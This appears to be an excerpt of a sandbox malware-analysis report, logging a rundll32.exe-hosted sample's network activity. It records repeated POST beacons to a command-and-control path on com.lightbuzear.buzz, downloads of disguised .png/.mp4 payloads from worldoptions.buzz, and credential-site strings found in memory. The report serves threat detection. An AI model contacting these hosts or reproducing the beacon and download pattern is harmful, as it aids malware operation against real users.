Source: global traffic TCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global traffic TCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443

Networking

Source: C:\Windows\System32\rundll32.exe Network Connect: 142.250.185.228 443
Source: C:\Windows\System32\rundll32.exe Domain query: com.lightbuzear.buzz
Source: C:\Windows\System32\rundll32.exe Network Connect: 64.52.80.180 443
Source: C:\Windows\System32\rundll32.exe Domain query: www.google.com
Source: Joe Sandbox View ASN Name: WINDSTREAMUS WINDSTREAMUS
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic HTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.Google.comContent-Length: 0Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.png HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: worldoptions.buzz Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.mp4 HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: worldoptions.buzz Connection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 49242 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49207 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49191 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49271 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49219
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49218
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49217
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49216
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49215
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49214
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49213
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49212
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49211
Source: unknown Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49210
Source: unknown Network traffic detected: HTTP traffic on port 49224 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49276 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49213 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49259 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49209
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49208
Source: unknown Network traffic detected: HTTP traffic on port 49230 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49207
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49206
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49205
Source: unknown Network traffic detected: HTTP traffic on port 49219 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49204
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49203
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49202
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49201
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49200
Source: unknown Network traffic detected: HTTP traffic on port 49202 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49225 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49231 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49258 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49247 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49264 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49208 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49196 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49236 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49179 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49253 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49270 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49269
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49268
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49267
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49266
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49265
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49264
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49263
Source: unknown Network traffic detected: HTTP traffic on port 49261 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49262
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49261
Source: unknown Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49260
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49195 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49237 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49214 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49220 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49259
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49258
Source: unknown Network traffic detected: HTTP traffic on port 49266 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49257
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49256
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49255
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49254
Source: unknown Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49253
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49252
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49251
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49250
Source: unknown Network traffic detected: HTTP traffic on port 49249 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49203 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49255 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49272 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49249
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49248
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49247
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49246
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49245
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49244
Source: unknown Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49243
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49242
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49241
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49240
Source: unknown Network traffic detected: HTTP traffic on port 49248 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49209 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49221 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49254 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49277 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49239
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49238
Source: unknown Network traffic detected: HTTP traffic on port 49243 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49237
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49236
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49235
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49234
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49233
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49232
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49231
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49230
Source: unknown Network traffic detected: HTTP traffic on port 49226 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49260 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49229
Source: unknown Network traffic detected: HTTP traffic on port 49215 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49228
Source: unknown Network traffic detected: HTTP traffic on port 49232 -> 443
Source: rundll32.exe, 00000005.00000002.1198605277.0000000000250000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com8 equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000005.00000002.1198605277.0000000000250000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
